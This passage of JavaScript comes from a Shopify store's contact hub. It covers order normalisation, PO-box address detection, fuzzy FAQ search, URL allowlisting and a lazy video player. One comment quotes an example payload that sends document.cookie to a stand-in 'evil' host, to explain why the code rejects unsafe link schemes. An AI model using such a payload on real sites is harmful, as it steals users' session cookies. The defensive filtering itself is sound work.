  if (Array.isArray(v.nodes)) return v.nodes.slice();
  return [];
}

function shallowCopy(o) {
  var out = {};
  for (var k in o) if (Object.prototype.hasOwnProperty.call(o, k)) out[k] = o[k];
  return out;
}

/* Shopify has no `customerName` field. It was invented by the old mock, so
   every Discord message and Notion page title would have read "undefined"
   against the real backend. Derive it, with two fallbacks. */
function deriveCustomerName(raw) {
  var c = raw.customer || {};
  var n = [c.firstName, c.lastName].filter(Boolean).join(" ").trim();
  if (n) return n;
  var a = raw.shippingAddress || {};
  n = String(a.name || [a.firstName, a.lastName].filter(Boolean).join(" ")).trim();
  if (n) return n;
  /* Last resort: what the customer typed into the lookup form. */
  n = (typeof State !== "undefined" && State.lookup && State.lookup.name)
        ? String(State.lookup.name).trim() : "";
  return n || "Customer";
}

function normaliseOrder(raw) {
  if (!raw) return null;
  var o = shallowCopy(raw);

  o.lineItems = gqlList(raw.lineItems).map(function (li) {
    var n = shallowCopy(li);
    if (!n.title && li.product && li.product.title) n.title = li.product.title;
    if (!n.variantTitle && li.variant && li.variant.title &&
        li.variant.title !== "Default Title") n.variantTitle = li.variant.title;
    n.quantity = Number(n.quantity || 0);

    /* ROUND 5 — LINE ITEM PROPERTIES, normalised to ONE shape.

       Shopify's GraphQL returns `customAttributes` as a plain array of
       {key,value}; REST calls the same thing `properties` and names the key
       field `name`; and a Worker that pre-flattens its response could hand us
       either, or a connection. All four are accepted here and become exactly
       one thing downstream: an array of {key,value} with string values, never
       undefined. Empty array when the field was not requested at all, so
       lineItemProperty() has a single shape to test and the spelling flow
       degrades to "no personalised items" rather than throwing.

       NOT FLATTENED TO AN OBJECT MAP. Shopify permits duplicate keys and does
       not guarantee an order; keeping the list means a second "Name" is visible
       to whoever debugs it rather than silently overwriting the first. */
    var attrs = Array.isArray(li.customAttributes) ? li.customAttributes
              : Array.isArray(li.properties)       ? li.properties
              : gqlList(li.customAttributes);
    n.customAttributes = attrs.map(function (a) {
      if (!a) return null;
      var k = a.key != null ? a.key : a.name;
      return { key: String(k == null ? "" : k), value: String(a.value == null ? "" : a.value) };
    }).filter(function (a) { return a && a.key; });

    /* Requested for the returns hub, carried through now so the query does not
       have to change again. Normalised to true/false/null — null meaning "the
       Worker did not return this field", which is genuinely different from
       false and must not be flattened into it. */
    n.merchantEditable = typeof li.merchantEditable === "boolean" ? li.merchantEditable : null;
    n.restockable      = typeof li.restockable      === "boolean" ? li.restockable      : null;
    return n;
  });

  o.fulfillments = gqlList(raw.fulfillments).map(function (f) {
    var n = shallowCopy(f);
    n.trackingInfo = Array.isArray(f.trackingInfo) ? f.trackingInfo : gqlList(f.trackingInfo);
    return n;
  });

  o.fulfillmentOrders = gqlList(raw.fulfillmentOrders).map(function (fo) {
    var n = shallowCopy(fo);
    /* [{action:"CREATE_FULFILLMENT"}] -> ["CREATE_FULFILLMENT"].
       Left undefined (not []) when absent, so foIsOpen() can tell
       "the field was not requested" apart from "no actions available". */
    if (Array.isArray(fo.supportedActions)) {
      n.supportedActions = fo.supportedActions.map(function (a) {
        return typeof a === "string" ? a : (a && a.action) || "";
      }).filter(Boolean);
    }
    return n;
  });

  o.shippingAddress = raw.shippingAddress || {};
  o.customerName    = deriveCustomerName(raw);

  /* OPTIONAL, and the single field that upgrades the eligibility model from a
     clock heuristic to the real thing.

     `trackingMovedAt` is an ISO timestamp meaning "the carrier has scanned this
     parcel at least once" — i.e. it has physically left. Shopify has no such
     field. 17TRACK does, as the first tracking event, and the Worker is the
     right place to fetch it. THE WIRING IS THIS LINE PLUS ONE IN THE WORKER:
     put trackingMovedAt on the order payload and evaluate() immediately treats
     the order as DISPATCHED regardless of how recent the label is.

     Normalised to null when absent so downstream code has one shape to test,
     and never invented here — an unscanned parcel must stay interceptable. */
  o.trackingMovedAt = raw.trackingMovedAt || null;

  /* OPTIONAL, and the fix for the other half of the same problem: every age is
     a server timestamp minus a clock, and until now that clock was the
     customer's device. `serverNow` is what the Worker's own clock said when it
     built the response. Captured once here together with the moment we received
     it, so nowMs() can carry it forward as the page stays open. Absent (today,
     and for anything that did not come from the Worker) -> nowMs() is plain
     Date.now() and behaviour is unchanged. See nowMs() and evaluate(). */
  var serverNow = raw.serverNow ? new Date(raw.serverNow).getTime() : NaN;
  if (!isNaN(serverNow)) {
    o._serverNowMs     = serverNow;
    o._serverNowSeenMs = Date.now();
  }
  return o;
}

/* Customers type "#LC12345", "LC12345", "lc 12345", "12345". All are valid. */
function normaliseOrderNumber(raw) {
  var d = String(raw || "").trim().toUpperCase()
    .replace(/^#/, "")
    .replace(/^LC/, "")
    .replace(/[\s\-_]/g, "");
  var re = new RegExp("^\\d{" + CONFIG.store.orderDigits + "}$");
  return re.test(d) ? d : null;
}
function isEmail(v) {
  return /^[^@\s]+@[^@\s]+\.[^@\s]+$/.test(String(v || "").trim());
}

/* ------------------------------------------------------------------------ */

/* ===========================================================================
   PO BOX / NON-DELIVERABLE ADDRESS DETECTION
   Verified: 80/80 test cases + a 56-address false-positive sweep (0 FPs).
   MUST also run server-side before any Discord/Notion write.
   =========================================================================== */
var HOMOGLYPHS = {
  "а":"a","в":"b","с":"c","е":"e","ѕ":"s","і":"i","ј":"j",
  "к":"k","м":"m","н":"h","о":"o","р":"p","т":"t","у":"y",
  "х":"x","ԁ":"d","ɡ":"g","ן":"l",
  "А":"a","В":"b","С":"c","Е":"e","Ѕ":"s","І":"i","Ј":"j",
  "К":"k","М":"m","Н":"h","О":"o","Р":"p","Т":"t","У":"y","Х":"x",
  "Α":"a","Β":"b","Ε":"e","Ζ":"z","Η":"h","Ι":"i","Κ":"k",
  "Μ":"m","Ν":"n","Ο":"o","Ρ":"p","Τ":"t","Υ":"y","Χ":"x",
  "ο":"o","ρ":"p","χ":"x","α":"a",
  "ß":"ss","œ":"oe","æ":"ae","Ø":"o","ø":"o",
  "Đ":"d","đ":"d","ł":"l","Ł":"l"
};

function poNormalise(raw) {
  if (raw == null) return "";
  var s = String(raw);
  s = s.replace(/[­​-‏‪-‮⁠﻿]/g, "");   // zero-width
  s = s.normalize("NFKC");                                                // fullwidth
  s = s.replace(/[Ͱ-ӿßæøØĐđŁłœɡן]/g,
        function (ch) { return HOMOGLYPHS[ch] !== undefined ? HOMOGLYPHS[ch] : ch; });
  s = s.normalize("NFD").replace(/[̀-ͯ]/g, "").normalize("NFC"); // accents
  s = s.toLowerCase();
  s = s.replace(/[\r\n]+/g, " | ");                                        // lines separate
  s = s.replace(/[‐-―−]/g, "-")
       .replace(/[․‧·]/g, ".")
       .replace(/[／⁄]/g, "/");
  return s.replace(/\s+/g, " ").trim();
}

/* Field start, just after a separator, or after "c/o" / "care of" / "attn". */
var PO_ANCHOR = "(?:^|[,;|/]\\s*|\\bc[/.\\s]?o[.\\s]+|\\bcare\\s+of\\s+|\\battn\\.?:?\\s+)";

/* Spelled-out box numbers. "PO Box Twelve" is a real thing people write, and
   every rule below used to require a literal digit, so it sailed through. */
var PO_NUMWORD = "(?:one|two|three|four|five|six|seven|eight|nine|ten|eleven|twelve|" +
                 "thirteen|fourteen|fifteen|sixteen|seventeen|eighteen|nineteen|twenty)";

/* TIER A — high confidence. Safe on address1, address2 AND company. */
var PO_TIER_A = [
  { id:"po_box", reason:"PO Box",
    /* Must be followed by a number (digits or spelled out), a separator, or end
       of field, so the Melbourne suburb "PO Box Hill" deliberately passes. */
    re: new RegExp("\\b(?:g|c)?p[.\\s\\-]*[o0][.\\s\\-]*b[o0]x(?![a-z])" +
                   "(?=[\\s.,:;#\\-]*(?:n(?:o|r|umber)?\\.?\\s*)?(?:\\d|" +
                   PO_NUMWORD + "\\b|$|[,;|/]))","i") },
  { id:"post_office_box", reason:"Post Office Box",
    re: /\bp[o0]st(?:al)?[\s\-]*(?:office[\s\-]*)?b[o0]x(?![a-z])/i },
  { id:"pob", reason:"POB",
    re: /\b(?:g|c)?p[.\s\-]*[o0][.\s\-]*b\.?[\s\-]*(?:#|n(?:o|r)?\.?)?[\s\-]*\d/i },
  { id:"po_hash", reason:"PO #",
    re: /\b(?:g|c)?p[.\s\-]*[o0][.\s\-]*#\s*\d/i },
  { id:"bag", reason:"Private, Locked or Postal Bag",
    /* "post" added: "Post Bag 5" is standard in several markets and the old
       prefix list ("postal") did not cover it. */
    re: /\b(?:private|locked|postal|post|mail|pvt\.?|p\/)[\s\-]*(?:mail[\s\-]*)?bags?(?![a-z])/i },
  { id:"intl_po_box", reason:"PO Boxes",
    /* The store ships internationally; the detector was English-only. */
    re: /\bpostfach\b|\bboite[\s\-]*postale\b|\bbp[\s.\-]*\d{1,6}\b|\bcasilla(?:[\s\-]*de[\s\-]*correo)?\b|\bapartado(?:[\s\-]*postal)?\b|\bcaixa[\s\-]*postal\b|\bpostbus\b/i },
  { id:"private_box", reason:"Private Box",
    re: /\bprivate[\s\-]*(?:mail[\s\-]*)?b[o0]x(?![a-z])/i },
  { id:"poste_restante", reason:"Poste Restante",
    re: /\bposte?[\s\-]*restante\b/i },
  { id:"general_delivery", reason:"General Delivery",
    re: /\bgeneral[\s\-]*delivery\b(?!\s*(?:rd|road|st|street|ave|avenue|ln|lane|dr|drive|way|close|cl|ct|court|pl|place|cres|crescent|tce|terrace|blvd|boulevard|pde|parade|hwy|highway|walk|row|mews|grove|park)\b)/i },
  { id:"parcel_locker", reason:"Parcel Locker or Parcel Collect",
    re: /\bparcel[\s\-]*(?:locker|lockers|collect|point|pickup|pick[\s\-]*up)\b|\bparcelocker\b|\bposte?[\s\-]*locker\b/i },
  { id:"community_mail_box", reason:"Community Mail Box",
    re: /\bcommunity[\s\-]*mail[\s\-]*b[o0]x(?:es)?(?![a-z])|\bsuper[\s\-]*mail[\s\-]*b[o0]x(?![a-z])|\bsuperb[o0]x(?![a-z])/i },
  { id:"dx_box", reason:"DX Box",
    re: /\bdx[\s\-]*b[o0]x(?![a-z])|\bdx[\s\-]*mail\b/i },
  { id:"rural_route_box", reason:"Rural Route or Highway Contract box",
    /* US "RR 2 Box 15" / "HC 65 Box 22" are USPS-only.
       NZ "RD 3" (Rural Delivery) is a real house and is NOT matched. */
    re: /\b(?:r\.?r\.?|h\.?c\.?|rural\s*route|route|rt\.?)[\s\-]*\d{1,3}[\s,\-]*b[o0]x[\s.#\-]*\d/i }
];

/* TIER B — bare acronyms and bare numbers. ADDRESS FIELDS ONLY: these collide
   with real company names ("CMB Engineering Ltd", "Box 8 Studios"). */
var PO_TIER_B = [
  { id:"standalone_box", reason:"Box number",
    re: new RegExp(PO_ANCHOR + "(?:mail[\\s\\-]*)?b[o0]x(?![a-z])[\\s.,:#\\-]*" +
                   "(?:n(?:o|r|um(?:ber)?)?\\.?[\\s\\-]*)?(?:\\d|" + PO_NUMWORD + "\\b)","i") },
  { id:"po_number", reason:"PO number",
    /* The trailing lookahead spares UK Portsmouth postcodes: PO16 7GZ, PO1 3AX. */
    re: new RegExp(PO_ANCHOR + "(?:g|c)?p[.\\s\\-]*[o0][.\\s\\-]{0,3}" +
                   "(?:n(?:o|r|um(?:ber)?)?\\.?[\\s\\-]*)?\\d{1,6}\\b(?!\\s*\\d?\\s*[a-z]{2}\\b)","i") },
  { id:"standalone_bag", reason:"Postal Bag",
    /* Bare "Bag 5" at the start of a field. Anchored and digit-terminated, so
       "10 Bagshot Row" and "Bag Lane 5" are untouched. */
    re: new RegExp(PO_ANCHOR + "bags?(?![a-z])[\\s.,:#\\-]*" +
                   "(?:n(?:o|r|um(?:ber)?)?\\.?[\\s\\-]*)?(?:\\d|" + PO_NUMWORD + "\\b)","i") },
  { id:"rpo", reason:"RPO (retail postal outlet)", re: /\brpo\b/i },
  /* Must be followed by a number, like every other bare-acronym rule here.
     A naked \bcmb\b wrongly blocked "CMB House, 12 High Street". */
  { id:"cmb", reason:"CMB (community mail box)",   re: /\bcmb[\s.#\-]*\d/i }
];

var PO_COPY = {
  po_box:"PO Boxes", post_office_box:"Post Office Boxes", pob:"PO Boxes", po_hash:"PO Boxes",
  intl_po_box:"PO Boxes",
  bag:"Private or Locked Bags", private_box:"Private Boxes",
  poste_restante:"Poste Restante addresses", general_delivery:"General Delivery addresses",
  parcel_locker:"Parcel Lockers", community_mail_box:"Community Mail Boxes",
  dx_box:"DX Boxes", rural_route_box:"Rural Route boxes",
  standalone_box:"PO Boxes", po_number:"PO Boxes", standalone_bag:"Postal Bags",
  rpo:"postal outlet addresses", cmb:"Community Mail Boxes"
};

function poScan(value, rules, fieldName) {
  var s = poNormalise(value);
  if (!s) return null;
  for (var i = 0; i < rules.length; i++) {
    var m = s.match(rules[i].re);
    if (m) {
      return {
        matched: m[0].replace(/^[,;|/]\s*/, "").trim(),
        rule: rules[i].id,
        field: fieldName,
        reason: "We can't ship to " + PO_COPY[rules[i].id] + ". Our courier hands parcels " +
                "to a person at the door, so anything sent there comes back to us."
      };
    }
  }
  return null;
}

/* `extra` is optional: { city, province, name }. Those fields were never
   scanned, so "Address line 1: c/o reception" + "Town or city: PO Box 4471"
   passed cleanly and shipped a PO Box straight to the 3PL. They are scanned
   with TIER A ONLY — Tier B's bare "Box 12" / "PO 4471" patterns collide with
   real city and person names. The `field` values map to input ids in the form.
   THIS FUNCTION MUST ALSO RUN SERVER-SIDE over the whole address object. */
function detectPoBox(address1, address2, company, extra) {
  var ALL = PO_TIER_A.concat(PO_TIER_B);
  var joined = [address1, address2].filter(Boolean).join(" | ");
  extra = extra || {};
  var hit = poScan(address1, ALL, "address line 1") ||
            poScan(address2, ALL, "address line 2") ||
            poScan(company,  PO_TIER_A, "company") ||
            poScan(joined,   ALL, "the address") ||  // "PO Box" on line 1, number on line 2
            poScan(extra.city,     PO_TIER_A, "town or city") ||
            poScan(extra.province, PO_TIER_A, "state or region") ||
            poScan(extra.name,     PO_TIER_A, "contact name");
  if (!hit) return { blocked:false, matched:null, reason:"" };
  return { blocked:true, matched:hit.matched, reason:hit.reason, rule:hit.rule, field:hit.field };
}

/* ------------------------------------------------------------------------ */

/* ===========================================================================
   FAQ INSTANT-ANSWER SEARCH — no libraries, no network, no AI.
   All 17 entries return themselves at rank 1; every alias lands in the top 3.
   =========================================================================== */
var LC_STOP = new Set(("a about an and any are as at be been but by can cant do does doesnt " +
  "for from get got had has have how i id if ill im in is it its just me my need of on or " +
  "our out please should so some that the their them then there these they this to us was " +
  "we were what when where which who why will with would you your yours").split(" "));

function lcNorm(s) {
  return String(s == null ? "" : s)
    .toLowerCase()
    .normalize("NFD").replace(/[̀-ͯ]/g, "")
    .replace(/[‘’'`]/g, "")
    .replace(/[^a-z0-9]+/g, " ")
    .replace(/\s+/g, " ")
    .trim();
}

/* Deliberately crude stemmer. Correctness doesn't matter, CONSISTENCY does —
   the same rule runs over the query and the index, so "shipping" and "ship"
   only have to collide with each other, not with a dictionary. */
function lcStem(t) {
  if (t.length <= 4) return t;
  var r = t;
  if (/ies$/.test(r) && r.length > 4)        r = r.slice(0, -3) + "y";
  else if (/(ss|us|is)$/.test(r))            { /* address, status — leave alone */ }
  else if (/able$/.test(r) && r.length > 6)  r = r.slice(0, -4);
  else if (/ing$/.test(r) && r.length > 6)   r = r.slice(0, -3);
  else if (/ed$/.test(r) && r.length > 5)    r = r.slice(0, -2);
  else if (/es$/.test(r) && r.length > 5)    r = r.slice(0, -2);
  else if (/s$/.test(r) && r.length > 4)     r = r.slice(0, -1);
  if (/([bcdfglmnprst])\1$/.test(r)) r = r.slice(0, -1);
  if (/e$/.test(r) && r.length > 4)  r = r.slice(0, -1);
  return r;
}

function lcTokens(s, keepStop) {
  var raw = lcNorm(s);
  if (!raw) return [];
  var out = [], parts = raw.split(" ");
  for (var i = 0; i < parts.length; i++) {
    var t = parts[i];
    if (!t) continue;
    if (!keepStop && LC_STOP.has(t)) continue;
    out.push(lcStem(t));
  }
  return out;
}

/* Damerau-Levenshtein (OSA) with early bail-out. Transpositions matter:
   "recieve", "adress", "teh" are all distance 1. */
function lcDist(a, b, max) {
  if (a === b) return 0;
  var la = a.length, lb = b.length;
  if (Math.abs(la - lb) > max) return max + 1;
  if (!la) return lb; if (!lb) return la;
  var prev2 = null, prev = new Array(lb + 1), cur, i, j;
  for (j = 0; j <= lb; j++) prev[j] = j;
  for (i = 1; i <= la; i++) {
    cur = new Array(lb + 1); cur[0] = i;
    var best = i;
    for (j = 1; j <= lb; j++) {
      var cost = a.charCodeAt(i - 1) === b.charCodeAt(j - 1) ? 0 : 1;
      var v = Math.min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost);
      if (i > 1 && j > 1 && a.charCodeAt(i - 1) === b.charCodeAt(j - 2) &&
                            a.charCodeAt(i - 2) === b.charCodeAt(j - 1)) {
        v = Math.min(v, prev2[j - 2] + 1);
      }
      cur[j] = v;
      if (v < best) best = v;
    }
    if (best > max) return max + 1;
    prev2 = prev; prev = cur;
  }
  return prev[lb];
}

/* Typo budget scales with length. Short words get none — "pad" must not
   fuzzy-match "bag". */
function lcBudget(len) { return len <= 3 ? 0 : len <= 5 ? 1 : len <= 9 ? 2 : 3; }

var LC_FIELD_W = { q:3.0, alias:2.0, tag:1.2, body:0.4 };
var LC_INDEX = null, LC_VOCAB = null;

function lcStripHtml(html) {
  return String(html || "").replace(/<[^>]*>/g, " ").replace(/&[a-z]+;/g, " ");
}

function lcBuildIndex(entries) {
  LC_VOCAB = new Set();
  /* Same gate as hubCardVisible(), and now literally the same predicate the
     URL is checked against — see lcFaqEntryVisible(). An entry marked
     `requires:"personalisation"` is not indexed at all while personalisation is
     switched off, so switching the feature off removes the answer as well as
     the card. Filtering at index time rather than at search time also keeps its
     vocabulary out of the compound-word splitter, so "embroidery" cannot
     influence scoring for an entry that can never be shown. */
  LC_INDEX = entries.filter(lcFaqEntryVisible).map(function (e) {
    var f = {
      q:     lcTokens(e.question),
      alias: lcTokens((e.aliases || []).join(" ")),
      tag:   lcTokens((e.tags || []).join(" ")),
      body:  lcTokens(lcStripHtml(e.answer)).slice(0, 120)
    };
    ["q","alias","tag"].forEach(function (k) {
      f[k].forEach(function (t) { LC_VOCAB.add(t); });
    });
    return {
      entry: e, fields: f,
      normQ: lcNorm(e.question),
      aliasNorms: new Set((e.aliases || []).map(lcNorm)),
      sets: { q:new Set(f.q), alias:new Set(f.alias), tag:new Set(f.tag), body:new Set(f.body) }
    };
  });
  return LC_INDEX;
}

/* "pooltent" / "orderstatus" — people run words together. */
function lcSplitCompound(tok) {
  if (tok.length < 6 || LC_VOCAB.has(tok)) return null;
  for (var i = 3; i <= tok.length - 3; i++) {
    var a = lcStem(tok.slice(0, i)), b = lcStem(tok.slice(i));
    if (LC_VOCAB.has(a) && LC_VOCAB.has(b)) return [a, b];
  }
  return null;
}

/* 1.0 exact, 0.8 prefix, 0.75 one typo, 0.55 two typos. */
function lcFieldHit(tok, set, list) {
  if (set.has(tok)) return 1.0;
  var budget = lcBudget(tok.length), best = 0;
  for (var i = 0; i < list.length; i++) {
    var cand = list[i];
    if (tok.length >= 4 && (cand.indexOf(tok) === 0 || tok.indexOf(cand) === 0)) {
      if (best < 0.8) best = 0.8;
      continue;
    }
    if (budget > 0 && cand.length >= 4 && Math.abs(cand.length - tok.length) <= budget) {
      /* lcDist returns budget+1 as an OVER-BUDGET SENTINEL. Compare against the
         budget — treating the sentinel as a real distance injects junk results. */
      var d = lcDist(tok, cand, budget);
      if (d === 1) { if (best < 0.75) best = 0.75; }
      else if (d === 2 && budget >= 2) { if (best < 0.55) best = 0.55; }
    }
  }
  return best;
}

function lcSearchFaq(query, opts) {
  opts = opts || {};
  var limit = opts.limit || 3;
  var minScore = opts.minScore != null ? opts.minScore : 0.55;
  if (!LC_INDEX) lcBuildIndex(opts.entries || CONFIG.faq);

  var normQ = lcNorm(query);
  if (normQ.length < 2) return [];

  var toks = [], base = lcTokens(query);
  for (var i = 0; i < base.length; i++) {
    var split = lcSplitCompound(base[i]);
    if (split) { toks.push(split[0]); toks.push(split[1]); }
    else toks.push(base[i]);
  }
  if (!toks.length) toks = lcTokens(query, true);   // query was all stopwords
  if (!toks.length) return [];

  var results = [];
  for (var r = 0; r < LC_INDEX.length; r++) {
    var rec = LC_INDEX[r], e = rec.entry;
    if (e.lastResort) continue;                    // never competes

    var sum = 0, matched = 0, strong = 0, exact = 0;
    for (var t = 0; t < toks.length; t++) {
      var tok = toks[t], bestW = 0;
      for (var k in LC_FIELD_W) {
        var qual = lcFieldHit(tok, rec.sets[k], rec.fields[k]);
        if (qual > 0) {
          var w = qual * LC_FIELD_W[k];
          if (w > bestW) bestW = w;
          /* Remember that SOMETHING matched perfectly, regardless of which
             field it was in — see the noise gate below. */
          if (qual >= 1 && k !== "body") exact++;
        }
      }
      if (bestW > 0) {
        sum += bestW; matched++;
        if (bestW >= LC_FIELD_W.alias * 0.75) strong++;
      }
    }
    if (!matched) continue;

    var score = sum / toks.length;
    score *= (0.55 + 0.45 * (matched / toks.length));

    /* Gated at 60% title coverage, otherwise a bare "tracking" hijacks
       "My tracking hasn't updated in days" instead of "How do I track my order?" */
    if (rec.normQ.indexOf(normQ) !== -1 && normQ.length >= rec.normQ.length * 0.6) {
      score += 2.5 * (normQ.length / rec.normQ.length);
    }
    if (rec.aliasNorms.has(normQ)) score += 2.0;    // typed an alias verbatim
    score += (e.boost || 0);

    /* One weak common word is noise — but an EXACT hit is not weak, whatever
       field it landed in. `strong` needs 1.5 and an exact tag hit only scores
       1.2, so a single-word query whose match lives in `tags` used to be thrown
       away every time: "video", "courier", "spam", "junk", "claim", "late",
       "gift" and nine others all fell through to "no direct match". */
    if (!strong && matched < 2 && !exact) continue;
    if (score < minScore) continue;
    results.push({ id:e.id, entry:e, score:Math.round(score * 1000) / 1000 });
  }

  results.sort(function (a, b) {
    return b.score - a.score || a.entry.question.length - b.entry.question.length;
  });
  return results.slice(0, limit);
}

/* A lastResort entry never COMPETES in the ranking (lcSearchFaq skips it
   outright), which had the side effect of making its aliases dead letters: its
   alias list includes "email you" and "contact you", and typing "email you"
   scored strongly against `no-confirmation-email` and returned one answer with
   no human path anywhere on the screen. An alias typed verbatim is the clearest
   possible statement of intent, so honour it — without letting the entry
   outrank a real answer. */
function lcWantsHuman(query) {
  var nq = lcNorm(query);
  if (!nq) return false;
  return CONFIG.faq.some(function (e) {
    if (!e.lastResort) return false;
    return (e.aliases || []).some(function (a) { return lcNorm(a) === nq; });
  });
}

function lcSearchWithFallback(query) {
  var hits = lcSearchFaq(query);
  if (hits.length) return { hits:hits, fallback:false, wantsHuman:lcWantsHuman(query) };
  var last = CONFIG.faq.filter(function (e) { return e.lastResort; });
  return { hits:last.map(function (e) { return { id:e.id, entry:e, score:0 }; }),
           fallback:true, wantsHuman:false };
}

/* Only these schemes may appear in a FAQ link. Requirement 7 makes CONFIG.faq
   editable in Shopify (section setting / metafield / GemPages rich text), and
   the moment it is, `link.href` is merchant- or attacker-controlled — at which
   point `javascript:fetch('https://evil/?c='+document.cookie)` is one paste
   away. Rejected hrefs are dropped, not rendered. */
function lcSafeHref(href) {
  var h = String(href == null ? "" : href).trim();
  return /^(?:\/(?!\/)|https:\/\/|mailto:)/i.test(h) ? h : null;
}

/* Same idea as lcSafeHref, tighter: a media URL is only ever a same-origin
   path or an https URL. No mailto:, no data:, no protocol-relative "//evil".
   Used for the FAQ video src/poster and for CONFIG.hubCards[].image, all three
   of which become merchant-editable the moment this moves into Shopify. */
var LC_MEDIA_HOSTS = ["cdn.shopify.com", "little-cubs.com"];

function lcSafeMediaSrc(src) {
  var s = String(src == null ? "" : src).trim();
  /* Root-relative is always ours. */
  if (/^\/(?!\/)/.test(s)) return s;
  if (!/^https:\/\//i.test(s)) return null;

  /* HOST ALLOWLIST, not just "is it https". The brief pins outbound hosts to
     cdn.shopify.com and little-cubs.com, and the video URL is a free-text
     theme setting: pasting a Vimeo or YouTube page URL into it produced a
     <video> element pointing at an HTML page — a black 16:9 box with a play
     button that can never decode, and no error a merchant would ever see.
     Rejecting it here means the answer renders without a player instead of
     with a broken one, and keeps a merchant from quietly widening the set of
     hosts this page talks to. */
  var host = s.slice(8).split("/")[0].split("?")[0].split("#")[0].split("@").pop()
              .split(":")[0].toLowerCase();
  for (var i = 0; i < LC_MEDIA_HOSTS.length; i++) {
    var h = LC_MEDIA_HOSTS[i];
    if (host === h || host.length > h.length + 1 &&
        host.slice(host.length - h.length - 1) === "." + h) return s;
  }
  return null;
}

/* ---------------------------------------------------------------------------
   FAQ VIDEO RENDERER
   Two providers, one schema:
     { provider:"file",  src:"…mp4", poster:"…jpg" }   ← what the pool tent uses
     { provider:"vimeo", id:"635691480", hash:"…" }    ← still supported
   Adding a third means adding a branch here and nothing else.

   THE DOWNLOAD PROBLEM. CONFIG.urls.poolTentVideoFile is a 7 MB MP4 sitting on
   the Shopify CDN (it was 43.1 MB until the client re-encoded it).
   `preload="none"` is still the single most important attribute on this page:
   without it every browser that lands on a search result containing this answer
   starts pulling the whole file — on a phone, on mobile data, for a customer who
   only wanted to know where their parcel is. Seven megabytes is a smaller
   accident than forty-three, but it is still an accident, and it is spent on
   people who never asked for the video. With it the
   browser fetches ZERO bytes until the play button is pressed. Do not "improve"
   it to "metadata": that still opens a connection and pulls the moov atom on
   every render.

   Everything else here exists to make that lazy player behave:
   - the 16:9 box is sized by CSS before anything loads, so the answer does not
     jump when a frame finally appears (no layout shift);
   - with no poster configured a real <button> placeholder is drawn over the
     player, because an unloaded <video> is otherwise an empty black rectangle
     that looks broken;
   - no autoplay, ever — so there is nothing for prefers-reduced-motion to
     suppress; motion only ever starts from a deliberate press.
   --------------------------------------------------------------------------- */
function lcRenderFaqVideo(e) {
  var v = e.video;
  if (!v) return "";

  if (v.provider === "file") {
    var src = lcSafeMediaSrc(v.src);
    if (!src) return "";
    var poster = lcSafeMediaSrc(v.poster || CONFIG.faqVideoPoster || "");
    /* The accessible name. A <video> has no intrinsic label, and "video" is
       what a screen reader announces without one. */
    var name = t("faq.video.name", { question: e.question });

    /* --ph only on the no-poster branch: it is the placeholder, not the
       player, that needs the box to grow with --lc-base. See the rule in
       contact-hub.css. */
    var html = '<div class="lc-answer__video lc-answer__video--file' +
               (poster ? '' : ' lc-answer__video--ph') + '">';
    /* TAB STOP ONLY WHEN THE PLAYER IS ACTUALLY VISIBLE.
       With no poster the placeholder <button> is painted opaquely over the
       whole player, and tabindex="0" plus `controls` then produced SIX
       invisible keyboard stops before the visible "Play the video" button: the
       video host, then five more as focus walked the browser's own shadow-DOM
       control bar (play / timeline / mute / volume / fullscreen), none of which
       can be seen or aimed at. Enter on the focused video does nothing, so a
       keyboard user pressed Enter on what looked like the play panel and got no
       response — WCAG 2.4.3 and 2.4.7, on the one control the answer is about.
       tabindex="-1" collapses that to a single stop on the real button, and
       programmatic focus (below, in the data-lc-play handler) ignores it, so
       focus still lands on the player the moment it is uncovered. WITH a poster
       no placeholder is drawn, the player is visible, and it keeps tabindex="0".
       width/height match the 16:9 box so the aspect ratio survives a theme that
       strips our stylesheet. */
    /* NO CLASS. The player is styled entirely by
       `#lc-hub .lc-answer__video--file video` — see the comment on that rule.
       It used to carry class="lc-video", a BEM base name with no rule behind
       it, which is an invitation to add a second, competing owner. */
    html += '<video controls preload="none" playsinline ' +
            'tabindex="' + (poster ? "0" : "-1") + '" width="640" height="360" ' +
            'aria-label="' + esc(name) + '"' +
            (poster ? ' poster="' + esc(poster) + '"' : "") + '>' +
              '<source src="' + esc(src) + '" type="video/mp4">' +
              /* Shown only by a browser that cannot play the element at all. */
              '<a href="' + esc(src) + '">' + esc(t("faq.video.openFallback")) + '</a>' +
            '</video>';

    if (!poster) {
      html += '<button type="button" class="lc-video__ph" data-lc-play ' +
                'aria-label="' + esc(t("faq.video.playLabel", { question: e.question })) + '">' +
                '<span class="lc-video__badge" aria-hidden="true">' +
                  '<svg viewBox="0 0 44 44" width="44" height="44" focusable="false" aria-hidden="true">' +
                    '<circle cx="22" cy="22" r="20" fill="#FFFFFF" stroke="currentColor" ' +
                      'stroke-width="1.9"/>' +
                    '<path d="M18 14.6c0-.7.8-1.2 1.4-.8l10 6.9c.6.4.6 1.3 0 1.7l-10 7.1c-.6.4-1.4 0-1.4-.8z" ' +
                      'fill="currentColor"/>' +
                  '</svg>' +
                '</span>' +
                '<span class="lc-video__phtxt">' + esc(t("faq.video.playText")) + '</span>' +
              '</button>';
    }
    html += '</div>';
    /* OUTSIDE the placeholder, so it renders in BOTH branches and in normal
       flow. It used to live inside the button, which meant (a) it disappeared
       the moment CONFIG.faqVideoPoster was set — which has now HAPPENED: the
       client set a poster, so this is the live branch and the placeholder is
       never drawn. Had the line stayed inside the button, the only on-screen
       statement that the file is not already downloading would have vanished
       with it, from exactly the audience that fears that most, and a poster
       frame makes that fear MORE reasonable, not less: a still image is what a
       video that has already loaded looks like — and (b) at 125% text and above
       its stacked content overflowed the height-locked 16:9 box (135px of
       content in a 137px box at
       375px), so at 200% the play badge struck through the answer paragraph
       above and this line collided with the link below. WCAG 1.4.4.

       IT ALSO HAD TO STOP SAYING "NOTHING DOWNLOADS". preload="none" governs
       the MEDIA only. The `poster` attribute is a separate image request that
       every browser fires the moment the element is inserted, and there is no
       lazy equivalent for it — so in the poster branch, which is the branch
       that now runs, a flat "nothing downloads until you press play" was
       simply false, to the mobile-data audience this whole file is written
       for. The wording below names what is actually lazy, and each branch says
       only what is true of it: the preview image is a few tens of KB, the
       7 MB file behind it still waits for a press. */
    return html + '<p class="lc-track-note" style="margin:8px 0 0">' +
                  t(poster ? "faq.video.notePoster" : "faq.video.noteNoPoster") +
                  '</p>';
  }

  if (v.provider === "vimeo" && /^\d+$/.test(String(v.id))) {
    var hash = /^[a-zA-Z0-9]+$/.test(String(v.hash || "")) ? v.hash : "";
    /* KEPT WORKING, deliberately unused: the pool tent moved to the client's
